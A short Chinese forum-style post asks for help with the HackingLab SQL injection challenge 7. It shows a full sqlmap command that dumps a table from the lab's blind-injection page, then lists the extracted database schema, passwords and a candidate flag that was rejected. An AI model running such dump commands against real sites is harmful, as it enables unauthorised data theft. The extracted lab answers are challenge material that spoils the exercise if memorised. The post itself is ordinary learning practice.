HackingLab 注入关第7题通过时间注入,获得了一些信息,但在填入FLAG值时都不正确,以下为结果,供大家参考
sqlmap -u "http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin" --dump -C "motto" -T "motto" -D "mydbs"
通过sqlmap获得了,数据库为mydbs,表有3个 log()、motto(id,motto,usirname)、user(id,password,usernameA),
user表的usernameA值为:空 ,而password值为:1234,guest,password
motto表的motto值为:happy everyday、key#notfoundC#、mymotto、nothing help,其他字段为空
感觉flag为key#notfoundC#,但录入后不正确,尝试 notfoundC也不对,直接懵了,请大家给点意见